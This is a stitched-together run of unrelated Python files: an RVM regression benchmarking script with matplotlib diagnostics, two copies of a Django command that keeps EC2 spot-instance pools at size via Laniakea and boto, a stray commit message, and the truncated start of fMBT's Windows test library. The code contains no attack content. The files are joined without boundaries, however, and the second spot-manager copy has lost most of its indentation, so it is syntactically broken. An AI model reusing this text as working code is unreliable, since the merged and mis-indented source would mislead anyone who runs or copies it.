        noise random variable
    Nruns : int, optional
        number of repeated fits
    return_coefs, return_models : boolean, optional
        additionally return the fitted full weight vectors / model instances

    Returns
    -------
    runtimes [, coefs] [, models]
    """
    X = base_trafo(x.reshape((-1, 1)))
    assert t is not None or not (tfun is None and epsilon is None), "Either 't' has to be given or 'tfun' and 'epsilon'!"
    if t is None:
        t = tfun(x) + epsilon.rvs(size=x.shape[0])
    runtimes = np.zeros(Nruns)
    coefs, models = [], []
    for run in range(Nruns):
        tic = time.time()
        model = model_type(**model_kwargs)
        model.fit(X, t)
        runtimes[run] = time.time() - tic
        if return_coefs:
            coefs.append(model.get_full_weights_vector())
        if return_models:
            models.append(model)
    extras = []
    if return_coefs:
        extras.append(np.array(coefs))
    if return_models:
        extras.append(models)
    return (runtimes, *extras) if extras else runtimes
def print_run_stats(base_trafo, x, runtimes, coefs, Nruns, show_coefs=True):
    """Print a short report of the repeated-regression runtimes and weights."""
    header = "X = {} & Nruns = {}:".format(base_trafo(x.reshape((-1, 1))).shape, Nruns)
    print("\n================================================")
    print(header)
    print("-" * len(header))
    print("\ntime: estimate = {:.4f}s, 2*std = {:.4f}s".format(runtimes.mean(), 2 * np.std(runtimes, ddof=1)))
    if not show_coefs:
        return
    print("\ncoefs (estimate +- 2*std):")
    # One line per weight: mean over runs plus a 2-sigma spread.
    for idx in range(coefs.shape[1]):
        print("    {}: {:.4f} +- {:.4f}".format(idx, coefs[:, idx].mean(axis=0), 2 * np.std(coefs[:, idx], axis=0, ddof=1)))
def plot_summary(models, noise, x, t, X, coefs, base_trafo):
    """Plot a 2x2 diagnostic summary of repeated RVM regressions plus a
    second figure with the MSE convergence curves of all models.

    Parameters
    ----------
    models : list of fitted RelevanceVectorMachine instances
    noise : np.ndarray
        the true noise realization used to generate the targets
    x : np.ndarray
        1d input values
    t : np.ndarray
        targets belonging to x
    X : np.ndarray
        design matrix for x (models predict on this)
    coefs : np.ndarray of shape (n_models, n_weights)
        full weight vectors of all models
    base_trafo : callable
        transform mapping raw inputs to the design matrix
    """
    ys = np.array([m.predict(X) for m in models])
    y = ys.mean(axis=0)
    yerr = 2*ys.std(axis=0, ddof=1)
    fig = plt.figure(figsize=(5, 7))
    # summarizing all predictions
    ax = fig.add_subplot(221)
    ax.fill_between(x, y-yerr, y+yerr, label="95%", alpha=0.1, color="red")
    ax.plot(x, t, 'o', label="true", markerfacecolor="None", ms=2., alpha=.75)
    ax.plot(x, y, '-', label="estimate")
    ax.set_xlabel("input")
    ax.set_ylabel("output")
    ax.set_title("y vs t")
    plt.legend(loc=0)
    coef_est = coefs.mean(axis=0)
    coef_err = 2*coefs.std(ddof=1, axis=0)
    # summarizing variation of weights
    ax2 = fig.add_subplot(222)
    ax2.errorbar(np.arange(coef_est.shape[0]), y=coef_est, yerr=coef_err, fmt="o",
                 markerfacecolor="None", label="RVM w", capsize=3.)
    ax2.set_xlabel("weight index")
    ax2.set_ylabel("weights")
    ax2.set_title("Variation of weights")
    plt.legend(loc=0)
    # noise precision: model vs true noise
    beta2scale = lambda beta: np.sqrt(2./beta)
    noise2scale = lambda noise, axis: np.sqrt(2.)*np.std(noise, axis=axis, ddof=1)
    betas = np.array([m.beta_ for m in models])
    ax3 = fig.add_subplot(223)
    # BUG FIX: the ``normed`` keyword was removed from matplotlib (>=3.1);
    # ``density`` is the supported, equivalent replacement.
    ax3.hist(noise, label="true noise", density=True, bins=100, range=(-5, 5))
    xlim = ax3.get_xlim()
    _xp = np.linspace(xlim[0], xlim[1], 100)
    for model in models:
        norm_rvm = stats.norm(loc=0, scale=beta2scale(model.beta_))
        ax3.plot(_xp, norm_rvm.pdf(_xp), '-k', linewidth=.1)
    ax3.set_xlabel("noise")
    ax3.set_ylabel("frequency")
    ax3.set_title("Noise precision:\nmodel vs true noise")
    ax3.text(-5, .8, "true scale = {:.3f}".format(noise2scale(noise, 0)))
    ax3.text(-5, .3, "est. scale = {:.3f}+-{:.3f}".format(beta2scale(betas).mean(), 2.*beta2scale(betas).std(ddof=1)))
    # noise precision: error distribution vs true noise
    ax4 = fig.add_subplot(224)
    bins = 100
    ax4.hist(noise, label="true noise", density=True, bins=bins, range=(-5, 5))
    # NOTE(review): xlim is taken from the first subplot (``ax``), not
    # ``ax4`` -- confirm this is intentional.
    xlim = ax.get_xlim()
    _xp = np.linspace(xlim[0], xlim[1], 100)
    _X = base_trafo(_xp.reshape((-1, 1)))
    pred_noise = []
    for model in models:
        # NOTE(review): assumes len(_xp) == len(t); predictions on the _xp
        # grid are compared against the original targets -- verify.
        n = model.predict(_X)-t
        pred_noise.append(n)
        ax4.hist(n, bins=bins, histtype="step", linewidth=.1, density=True, range=xlim, color="k")
    pred_noise = np.array(pred_noise)
    ax4.set_xlabel("noise")
    ax4.set_ylabel("frequency")
    ax4.set_title("Noise precision:\nerr. dis. vs true noise")
    ax4.text(-5, 1., "true scale = {:.3f}".format(noise2scale(noise, 0)))
    ax4.text(-5, .3, "pred scale = {:.3f}+-{:.3f}".format(noise2scale(pred_noise, 1).mean(), noise2scale(pred_noise, 1).std(ddof=1)*2))
    plt.tight_layout()
    plt.show()
    fig = plt.figure(figsize=(5, 5))
    ax = fig.add_subplot(111)
    for m in models:
        ax.plot(m.mse_, 'k-', alpha=.5, lw=.1)
    ax.set_xlabel("iteration")
    ax.set_ylabel("MSE")
    ax.set_yscale("log")
    ax.set_title("MSE curves of all regressions")
    plt.tight_layout()
    plt.show()
if __name__ == "__main__":
    # Experiment: repeated RVM regressions with randomized hyper-parameter
    # initialization for an increasing number of Fourier basis functions.
    epsilon = stats.norm(loc=0, scale=0.01)
    tfun = lambda x: np.sin(x) + np.cos(2.*x)
    init_beta = distribution_wrapper(stats.halfnorm(scale=1), size=1, single=True)
    init_alphas = distribution_wrapper(stats.halfnorm(scale=1), single=False)
    Nruns = 100
    N = 100
    Ms = [3, 5, 10, 20, 50]
    t_est, t_err = [], []
    for M in Ms:
        x = np.linspace(0, 1, N)
        k = M
        trafo = FourierFeatures(k=k)
        base_trafo = trafo.fit_transform
        model_type = RelevanceVectorMachine
        model_kwargs = dict(n_iter=250, verbose=False, compute_score=True, init_beta=init_beta,
                            init_alphas=init_alphas)
        # BUG FIX: was ``regression_speedtest`` (undefined); the helper with
        # this exact signature and return is ``repeated_regression``.
        runtimes, coefs = repeated_regression(x, base_trafo, model_type, t=None, tfun=tfun, epsilon=epsilon,
                                              model_kwargs=model_kwargs, Nruns=Nruns, return_coefs=True)
        print_run_stats(base_trafo, x, runtimes, coefs, Nruns)
from django.core.management.base import NoArgsCommand
from ec2spotmanager.models import PoolConfiguration, InstancePool, Instance, INSTANCE_STATE
from django.conf import settings
from ec2spotmanager.management.common import mgmt_lock_required
import warnings
import datetime
import time
import logging
import threading
from django.utils import timezone
from laniakea.laniakea import LaniakeaCommandLine
from laniakea.core.manager import Laniakea
import boto.ec2
import boto.exception
class Command(NoArgsCommand):
    # NOTE(review): help text looks copy-pasted from a bug-status command;
    # runtime string kept unchanged, but consider rewording.
    help = "Check the status of all bugs we have"

    @mgmt_lock_required
    def handle_noargs(self, **options):
        """Management-command entry point: reconcile all pools forever.

        Sleeps 10 seconds between passes; never returns. Decorated with
        ``mgmt_lock_required``, presumably so only one reconciler runs at a
        time -- see that decorator for the exact semantics.
        """
        while True:
            self.check_instance_pools()
            time.sleep(10)

    def check_instance_pools(self):
        """Bring every InstancePool to its configured size, cycling if due."""
        instance_pools = InstancePool.objects.all()
        # Process all instance pools
        for instance_pool in instance_pools:
            config = instance_pool.config.flatten()
            instances = Instance.objects.filter(pool=instance_pool)
            instances_missing = config.size
            running_instances = []
            # Sync database state with EC2 before counting.
            self.update_pool_instances(instance_pool, instances, config)
            for instance in instances:
                if instance.status_code == INSTANCE_STATE['running'] or instance.status_code == INSTANCE_STATE['pending']:
                    instances_missing -= 1
                    running_instances.append(instance)
                else:
                    # The instance is no longer running, delete it from our database
                    instance.delete()
            # Continue working with the instances we have running
            instances = running_instances
            if (not instance_pool.last_cycled) or instance_pool.last_cycled < timezone.now() - timezone.timedelta(seconds=config.cycle_interval):
                print("[Main] Pool needs to be cycled, terminating all instances...")
                instance_pool.last_cycled = timezone.now()
                self.terminate_pool_instances(instance_pool, instances, config, terminateByPool=True)
                instance_pool.save()
                self.update_pool_instances(instance_pool, instances, config)
                print("[Main] Pool termination complete.")
            if instances_missing > 0:
                print("[Main] Pool needs %s more instances, starting..." % instances_missing)
                self.start_pool_instances(instance_pool, config, count=instances_missing)
            elif instances_missing < 0:
                # Select the oldest instances we have running and terminate
                # them so we meet the size limitation again. instances_missing
                # is negative here, so -instances_missing is a positive slice
                # bound (Django querysets forbid negative slicing).
                print("[Main] Pool has %s instances over limit, terminating..." % -instances_missing)
                instances = Instance.objects.filter(pool=instance_pool).order_by('created')[:-instances_missing]
                self.terminate_pool_instances(instance_pool, instances, config)
            else:
                print("[Main] Pool size ok.")

    def get_best_region_zone(self, config):
        """Return the (region, zone) pair with the lowest spot-price median.

        Fetches six hours of spot-price history for every allowed region in
        parallel and picks the zone with the lowest price median whose most
        recent price is still below ec2_max_price.
        """
        def get_spot_price_per_region(region_name, profile_name, instance_type):
            '''Gets spot prices of the specified region and instance type'''
            now = datetime.datetime.now()
            start = now - datetime.timedelta(hours=6)
            r = boto.ec2.connect_to_region(region_name, profile_name=profile_name).get_spot_price_history(
                start_time=start.isoformat(),
                end_time=now.isoformat(),
                instance_type=instance_type,
                product_description="Linux/UNIX") #TODO: Make configurable
            return r

        def get_price_median(data):
            # Floor division keeps the index an int under Python 3.
            sdata = sorted(data)
            n = len(sdata)
            if not n % 2:
                return (sdata[n // 2] + sdata[n // 2 - 1]) / 2.0
            return sdata[n // 2]

        from multiprocessing import Pool, cpu_count
        # NOTE(review): dispatching a nested function relies on fork-based
        # multiprocessing; it is not picklable under the spawn start method.
        pool = Pool(cpu_count())
        try:
            results = []
            for region in config.ec2_allowed_regions:
                # BUG FIX: the flattened config attribute carries the "ec2_"
                # prefix (was ``config.instance_type``).
                f = pool.apply_async(get_spot_price_per_region, [region, "laniakea", config.ec2_instance_type])
                results.append(f)
            prices = {}
            for result in results:
                for entry in result.get():
                    if entry.region.name not in prices:
                        prices[entry.region.name] = {}
                    zone = entry.availability_zone
                    if zone not in prices[entry.region.name]:
                        prices[entry.region.name][zone] = []
                    prices[entry.region.name][zone].append(entry.price)
        finally:
            # Don't leak worker processes on every poll cycle.
            pool.close()
            pool.join()
        # Calculate median values for all availability zones and best zone/price
        best_zone = None
        best_region = None
        best_median = None
        for region in prices:
            for zone in prices[region]:
                # Do not consider a zone/region combination that has a current
                # price higher than the maximum price we are willing to pay,
                # even if the median would end up being lower than our maximum.
                if prices[region][zone][-1] > config.ec2_max_price:
                    continue
                median = get_price_median(prices[region][zone])
                if best_median is None or best_median > median:
                    best_median = median
                    best_zone = zone
                    best_region = region
        return (best_region, best_zone)

    def create_laniakea_images(self, config):
        """Translate our pool configuration into a Laniakea images dict."""
        images = { "default" : {} }
        # These are the configuration keys we want to put into the target configuration
        # without further preprocessing, except for the adjustment of the key name itself.
        keys = [
            'ec2_key_name',
            'ec2_image_name',
            'ec2_instance_type',
            'ec2_security_groups',
        ]
        for key in keys:
            lkey = key.replace("ec2_", "", 1)
            images["default"][lkey] = config[key]
        if config.ec2_raw_config:
            images["default"].update(config.ec2_raw_config)
        return images

    def start_pool_instances(self, pool, config, count=1):
        """ Start an instance with the given configuration """
        images = self.create_laniakea_images(config)
        # Figure out where to put our instances
        (region, zone) = self.get_best_region_zone(config)
        print("Using region %s with availability zone %s" % (region,zone))
        instances = []
        # Create all our instances as pending, the async thread will update them once
        # they have been spawned.
        for i in range(0,count):
            instance = Instance()
            instance.ec2_region = region
            instance.status_code = INSTANCE_STATE["pending"]
            instance.pool = pool
            instance.save()
            instances.append(instance)

        # This method will run async to spawn our machines
        def start_instances_async(pool, config, count, images, region, zone, instances):
            userdata = LaniakeaCommandLine.handle_import_tags(config.ec2_userdata)
            userdata = LaniakeaCommandLine.handle_tags(userdata, config.ec2_userdata_macros)
            if not userdata:
                raise RuntimeError("start_instance: Failed to compile userdata")
            images["default"]['user_data'] = userdata
            images["default"]['placement'] = zone
            images["default"]['count'] = count
            cluster = Laniakea(images)
            try:
                cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
            except Exception as msg:
                logging.error("%s: laniakea failure: %s" % ("start_instances_async", msg))
                return
            config.ec2_tags['SpotManager-PoolId'] = str(pool.pk)
            try:
                print("Creating %s instances" % count)
                (boto_instances, boto_pending) = cluster.create_spot(config.ec2_max_price, tags=config.ec2_tags, delete_on_termination=True, timeout=20*60)
                print("Successfully created %s instances, %s requests timed out and were canceled" % (len(boto_instances), len(boto_pending)))
                assert (len(boto_instances) + len(boto_pending)) == len(instances) == count
                for i in range(0,len(boto_instances)):
                    instances[i].hostname = boto_instances[i].public_dns_name
                    instances[i].ec2_instance_id = boto_instances[i].id
                    instances[i].status_code = boto_instances[i].state_code
                    instances[i].save()
                if boto_pending:
                    # BUG FIX: pending (canceled) requests occupy the tail of
                    # ``instances``; the loop previously stopped at
                    # len(boto_pending) and could skip the canceled entries.
                    for i in range(len(boto_instances), len(instances)):
                        # Delete instances belonging to canceled spot requests
                        print("Deleting instance with id %s (belongs to canceled request)" % instances[i].pk)
                        instances[i].delete()
            except boto.exception.EC2ResponseError as msg:
                logging.error("%s: boto failure: %s" % ("start_instances_async", msg))
                return

        # TODO: We don't get any information back from the async method call here, but should handle failures!
        t = threading.Thread(target=start_instances_async, args = (pool, config, count, images, region, zone, instances))
        t.start()

    def terminate_pool_instances(self, pool, instances, config, terminateByPool=False):
        """ Terminate an instance with the given configuration """
        instance_ids_by_region = self.get_instance_ids_by_region(instances)
        for region in instance_ids_by_region:
            cluster = Laniakea(None)
            try:
                cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
            except Exception as msg:
                logging.error("%s: laniakea failure: %s" % ("terminate_pool_instances", msg))
                return None
            try:
                if terminateByPool:
                    boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
                    # Data consistency checks
                    for boto_instance in boto_instances:
                        assert ((boto_instance.id in instance_ids_by_region[region])
                                or (boto_instance.state_code == INSTANCE_STATE['shutting-down']
                                    or boto_instance.state_code == INSTANCE_STATE['terminated']))
                    cluster.terminate(boto_instances)
                else:
                    print("Terminating %s instances in region %s" % (len(instance_ids_by_region[region]),region))
                    cluster.terminate(cluster.find(instance_ids=instance_ids_by_region[region]))
            except boto.exception.EC2ResponseError as msg:
                logging.error("%s: boto failure: %s" % ("terminate_pool_instances", msg))
                return 1

    def get_instance_ids_by_region(self, instances):
        """Group the EC2 instance ids of ``instances`` by their region."""
        instance_ids_by_region = {}
        for instance in instances:
            if not instance.ec2_region in instance_ids_by_region:
                instance_ids_by_region[instance.ec2_region] = []
            instance_ids_by_region[instance.ec2_region].append(instance.ec2_instance_id)
        return instance_ids_by_region

    def get_instances_by_ids(self, instances):
        """Map EC2 instance id -> database Instance object."""
        instances_by_ids = {}
        for instance in instances:
            instances_by_ids[instance.ec2_instance_id] = instance
        return instances_by_ids

    def update_pool_instances(self, pool, instances, config):
        """ Check the state of the instances in a pool and update it in the database """
        instance_ids_by_region = self.get_instance_ids_by_region(instances)
        instances_by_ids = self.get_instances_by_ids(instances)
        for region in instance_ids_by_region:
            cluster = Laniakea(None)
            try:
                cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
            except Exception as msg:
                logging.error("%s: laniakea failure: %s" % ("update_pool_instances", msg))
                return None
            try:
                boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
                for boto_instance in boto_instances:
                    # Whenever we see an instance that is not in our instance list for that region,
                    # make sure it's a terminated instance because we should never have running instance
                    #
                    # We must however not perform this check if we still have pending instances.
                    # In this case, the thread that is monitoring the pending instances must first
                    # redeclare them with their proper id in the database before we perform *any*
                    # updates on it. Otherwise, parallel save operations on the instance object
                    # might lead to inconsistent states of the database model
                    if not boto_instance.id in instance_ids_by_region[region]:
                        # NOTE(review): ``None in instance_ids_by_region`` tests
                        # the dict *keys* (regions); pending instances put None
                        # into the per-region id *lists* -- confirm intended.
                        if not None in instance_ids_by_region:
                            assert (boto_instance.state_code == INSTANCE_STATE['shutting-down']
                                    or boto_instance.state_code == INSTANCE_STATE['terminated'])
                        continue
                    instance = instances_by_ids[boto_instance.id]
                    # Check the status code and update if necessary
                    if instance.status_code != boto_instance.state_code:
                        instance.status_code = boto_instance.state_code
                        instance.save()
                    # If for some reason we don't have a hostname yet,
                    # update it accordingly.
                    if not instance.hostname:
                        instance.hostname = boto_instance.public_dns_name
                        instance.save()
            except boto.exception.EC2ResponseError as msg:
                logging.error("%s: boto failure: %s" % ("update_pool_instances", msg))
                return 1
Fix another missing "ec2_" prefix: use config.ec2_instance_type instead of config.instance_type in get_best_region_zone.
from django.core.management.base import NoArgsCommand
from ec2spotmanager.models import PoolConfiguration, InstancePool, Instance, INSTANCE_STATE
from django.conf import settings
from ec2spotmanager.management.common import mgmt_lock_required
import warnings
import datetime
import time
import logging
import threading
from django.utils import timezone
from laniakea.laniakea import LaniakeaCommandLine
from laniakea.core.manager import Laniakea
import boto.ec2
import boto.exception
class Command(NoArgsCommand):
help = "Check the status of all bugs we have"
    @mgmt_lock_required
    def handle_noargs(self, **options):
        """Management-command entry point: reconcile all pools forever.

        Sleeps 10 seconds between passes; never returns. Decorated with
        ``mgmt_lock_required``, presumably so only one reconciler runs at a
        time -- see that decorator for the exact semantics.
        """
        while True:
            self.check_instance_pools()
            time.sleep(10)
    def check_instance_pools(self):
        """Reconcile every InstancePool with its flattened configuration.

        For each pool: refresh instance state from EC2, drop dead database
        entries, cycle the whole pool when cycle_interval has elapsed, and
        finally grow or shrink the pool towards the configured size.
        """
        instance_pools = InstancePool.objects.all()
        # Process all instance pools
        for instance_pool in instance_pools:
            config = instance_pool.config.flatten()
            instances = Instance.objects.filter(pool=instance_pool)
            instances_missing = config.size
            running_instances = []
            # Sync database state with EC2 before counting.
            self.update_pool_instances(instance_pool, instances, config)
            for instance in instances:
                if instance.status_code == INSTANCE_STATE['running'] or instance.status_code == INSTANCE_STATE['pending']:
                    instances_missing -= 1
                    running_instances.append(instance)
                else:
                    # The instance is no longer running, delete it from our database
                    instance.delete()
            # Continue working with the instances we have running
            instances = running_instances
            if (not instance_pool.last_cycled) or instance_pool.last_cycled < timezone.now() - timezone.timedelta(seconds=config.cycle_interval):
                print("[Main] Pool needs to be cycled, terminating all instances...")
                instance_pool.last_cycled = timezone.now()
                self.terminate_pool_instances(instance_pool, instances, config, terminateByPool=True)
                instance_pool.save()
                self.update_pool_instances(instance_pool, instances, config)
                print("[Main] Pool termination complete.")
            # Determine which instances need to be cycled
            #outdated_instances = instances.filter(created__lt = timezone.now() - timezone.timedelta(seconds=config.cycle_interval))
            # Terminate all instances that need cycling
            #for instance in outdated_instances:
            #    self.terminate_instance(instance, config)
            #    instances_missing += 1
            if instances_missing > 0:
                print("[Main] Pool needs %s more instances, starting..." % instances_missing)
                self.start_pool_instances(instance_pool, config, count=instances_missing)
            elif instances_missing < 0:
                # Select the oldest instances we have running and terminate
                # them so we meet the size limitation again.
                # instances_missing is negative here, so -instances_missing is
                # a positive slice bound (querysets forbid negative slicing).
                print("[Main] Pool has %s instances over limit, terminating..." % -instances_missing)
                instances = Instance.objects.filter(pool=instance_pool).order_by('created')[:-instances_missing]
                self.terminate_pool_instances(instance_pool, instances, config)
            else:
                print("[Main] Pool size ok.")
def get_best_region_zone(self, config):
def get_spot_price_per_region(region_name, profile_name, instance_type):
'''Gets spot prices of the specified region and instance type'''
now = datetime.datetime.now()
start = now - datetime.timedelta(hours=6)
r = boto.ec2.connect_to_region(region_name, profile_name=profile_name).get_spot_price_history(
start_time=start.isoformat(),
end_time=now.isoformat(),
instance_type=instance_type,
product_description="Linux/UNIX") #TODO: Make configurable
return r
def get_price_median(data):
sdata = sorted(data)
n = len(sdata)
if not n % 2:
return (sdata[n / 2] + sdata[n / 2 - 1]) / 2.0
return sdata[n / 2]
from multiprocessing import Pool, cpu_count
pool = Pool(cpu_count())
results = []
for region in config.ec2_allowed_regions:
f = pool.apply_async(get_spot_price_per_region, [region, "laniakea", config.ec2_instance_type])
results.append(f)
prices = {}
for result in results:
#r = result.get()
for entry in result.get():
if not entry.region.name in prices:
prices[entry.region.name] = {}
zone = entry.availability_zone
if not zone in prices[entry.region.name]:
prices[entry.region.name][zone] = []
prices[entry.region.name][zone].append(entry.price)
# Calculate median values for all availability zones and best zone/price
best_zone = None
best_region = None
best_median = None
for region in prices:
for zone in prices[region]:
# Do not consider a zone/region combination that has a current
# price higher than the maximum price we are willing to pay,
# even if the median would end up being lower than our maximum.
if prices[region][zone][-1] > config.ec2_max_price:
continue
median = get_price_median(prices[region][zone])
if best_median == None or best_median > median:
best_median = median
best_zone = zone
best_region = region
return (best_region, best_zone)
def create_laniakea_images(self, config):
images = { "default" : {} }
# These are the configuration keys we want to put into the target configuration
# without further preprocessing, except for the adjustment of the key name itself.
keys = [
'ec2_key_name',
'ec2_image_name',
'ec2_instance_type',
'ec2_security_groups',
]
for key in keys:
lkey = key.replace("ec2_", "", 1)
images["default"][lkey] = config[key]
if config.ec2_raw_config:
images["default"].update(config.ec2_raw_config)
return images
def start_pool_instances(self, pool, config, count=1):
    """ Start an instance with the given configuration """
    # Laniakea image configuration derived from the pool configuration.
    images = self.create_laniakea_images(config)
    # Figure out where to put our instances
    (region, zone) = self.get_best_region_zone(config)
    print("Using region %s with availability zone %s" % (region,zone))
    instances = []
    # Create all our instances as pending, the async thread will update them once
    # they have been spawned.
    for i in range(0,count):
        instance = Instance()
        instance.ec2_region = region
        instance.status_code = INSTANCE_STATE["pending"]
        instance.pool = pool
        instance.save()
        instances.append(instance)
    # This method will run async to spawn our machines
    def start_instances_async(pool, config, count, images, region, zone, instances):
        # Expand import tags and userdata macros before uploading.
        userdata = LaniakeaCommandLine.handle_import_tags(config.ec2_userdata)
        userdata = LaniakeaCommandLine.handle_tags(userdata, config.ec2_userdata_macros)
        if not userdata:
            raise RuntimeError("start_instance: Failed to compile userdata")
        images["default"]['user_data'] = userdata
        images["default"]['placement'] = zone
        images["default"]['count'] = count
        cluster = Laniakea(images)
        try:
            cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
        except Exception as msg:
            logging.error("%s: laniakea failure: %s" % ("start_instances_async", msg))
            return
        # Tag the spot requests so terminate/update can find them by pool id.
        config.ec2_tags['SpotManager-PoolId'] = str(pool.pk)
        try:
            print("Creating %s instances" % count)
            (boto_instances, boto_pending) = cluster.create_spot(config.ec2_max_price, tags=config.ec2_tags, delete_on_termination=True, timeout=20*60)
            print("Successfully created %s instances, %s requests timed out and were canceled" % (len(boto_instances), len(boto_pending)))
            assert (len(boto_instances) + len(boto_pending)) == len(instances) == count
            # Redeclare the pending DB entries with the real EC2 data.
            for i in range(0,len(boto_instances)):
                instances[i].hostname = boto_instances[i].public_dns_name
                instances[i].ec2_instance_id = boto_instances[i].id
                instances[i].status_code = boto_instances[i].state_code
                instances[i].save()
            if boto_pending:
                # NOTE(review): the range end looks wrong — to delete all
                # trailing pending entries this should presumably iterate up to
                # len(instances) rather than len(boto_pending); confirm.
                for i in range(len(boto_instances),len(boto_pending)):
                    # Delete instances belong to canceled spot requests
                    print("Deleting instance with id %s (belongs to canceled request)" % instances[i].pk)
                    instances[i].delete()
        except boto.exception.EC2ResponseError as msg:
            logging.error("%s: boto failure: %s" % ("start_instances_async", msg))
            return
    # TODO: We don't get any information back from the async method call here, but should handle failures!
    t = threading.Thread(target=start_instances_async, args = (pool, config, count, images, region, zone, instances))
    t.start()
def terminate_pool_instances(self, pool, instances, config, terminateByPool=False):
    """ Terminate an instance with the given configuration """
    instance_ids_by_region = self.get_instance_ids_by_region(instances)
    for region in instance_ids_by_region:
        # Fresh per-region connection; no image configuration is needed
        # for terminating.
        cluster = Laniakea(None)
        try:
            cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
        except Exception as msg:
            logging.error("%s: laniakea failure: %s" % ("terminate_pool_instances", msg))
            # NOTE(review): returning here aborts termination for any regions
            # not yet processed — confirm this is intended.
            return None
        try:
            if terminateByPool:
                # Terminate everything carrying this pool's tag, not just the
                # instances passed in.
                boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
                # Data consistency checks
                for boto_instance in boto_instances:
                    assert ((boto_instance.id in instance_ids_by_region[region])
                        or (boto_instance.state_code == INSTANCE_STATE['shutting-down']
                        or boto_instance.state_code == INSTANCE_STATE['terminated']))
                cluster.terminate(boto_instances)
            else:
                print("Terminating %s instances in region %s" % (len(instance_ids_by_region[region]),region))
                cluster.terminate(cluster.find(instance_ids=instance_ids_by_region[region]))
        except boto.exception.EC2ResponseError as msg:
            logging.error("%s: boto failure: %s" % ("terminate_pool_instances", msg))
            return 1
def get_instance_ids_by_region(self, instances):
    """ Group the EC2 instance ids of the given instances by their region. """
    ids_by_region = {}
    for inst in instances:
        ids_by_region.setdefault(inst.ec2_region, []).append(inst.ec2_instance_id)
    return ids_by_region
def get_instances_by_ids(self, instances):
    """ Map each instance's EC2 instance id to its database object. """
    return dict((inst.ec2_instance_id, inst) for inst in instances)
def update_pool_instances(self, pool, instances, config):
    """ Check the state of the instances in a pool and update it in the database """
    instance_ids_by_region = self.get_instance_ids_by_region(instances)
    instances_by_ids = self.get_instances_by_ids(instances)
    for region in instance_ids_by_region:
        cluster = Laniakea(None)
        try:
            cluster.connect(region=region, aws_access_key_id=config.aws_access_key_id, aws_secret_access_key=config.aws_secret_access_key)
        except Exception as msg:
            logging.error("%s: laniakea failure: %s" % ("update_pool_instances", msg))
            return None
        try:
            #cluster.find(instance_ids=instance_ids_by_region[region])
            # Look up by pool tag so terminated/rogue instances are seen too.
            boto_instances = cluster.find(filters={"tag:SpotManager-PoolId" : str(pool.pk)})
            for boto_instance in boto_instances:
                # Whenever we see an instance that is not in our instance list for that region,
                # make sure it's a terminated instance because we should never have running instance
                #
                # We must however not perform this check if we still have pending instances.
                # In this case, the thread that is monitoring the pending instances must first
                # redeclare them with their proper id in the database before we perform *any*
                # updates on it. Otherwise, parallel save operations on the instance object
                # might lead to inconsistent states of the database model
                if not boto_instance.id in instance_ids_by_region[region]:
                    # NOTE(review): this tests for a None *region* key, whereas
                    # pending instances would show up as a None *instance id*
                    # inside the region's id list — confirm which was intended.
                    if not None in instance_ids_by_region:
                        assert (boto_instance.state_code == INSTANCE_STATE['shutting-down']
                            or boto_instance.state_code == INSTANCE_STATE['terminated'])
                    continue
                instance = instances_by_ids[boto_instance.id]
                # Check the status code and update if necessary
                if instance.status_code != boto_instance.state_code:
                    instance.status_code = boto_instance.state_code
                    instance.save()
                # If for some reason we don't have a hostname yet,
                # update it accordingly.
                if not instance.hostname:
                    instance.hostname = boto_instance.public_dns_name
                    instance.save()
        except boto.exception.EC2ResponseError as msg:
            logging.error("%s: boto failure: %s" % ("update_pool_instances", msg))
            return 1
|
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This library implements the fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import subprocess
import zlib
try:
import fmbtpng
except ImportError:
fmbtpng = None
# Whether child processes should close inherited file descriptors.
# Disabled on Windows: Python 2 subprocess cannot combine close_fds
# with redirected stdout/stderr there — presumably why it is off; see _run().
if os.name == "nt":
    _g_closeFds = False
else:
    _g_closeFds = True
def _adapterLog(msg):
    # Route adapter-level messages to the fMBT adapter log, tagged with
    # the module name.
    fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
    """
    Execute command in child process, return status, stdout, stderr.

    Parameters:

      command (string or list of strings):
              executed through a shell when a string, directly otherwise.

      expectedExitStatus (list of integers or None, optional):
              when given, the child is waited for and FMBTWindowsError
              is raised unless the exit status is in the list. When
              None, the child is not waited for and out/err are
              ('', None).
    """
    if type(command) == str:
        shell = True
    else:
        shell = False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=_g_closeFds)
        if expectedExitStatus != None:
            out, err = p.communicate()
        else:
            # Fire-and-forget: caller does not care about the exit status.
            out, err = ('', None)
    except Exception, e:
        # Launch failed: fake a process object carrying the shell-style
        # "command not found" status 127.
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    if (expectedExitStatus != None and
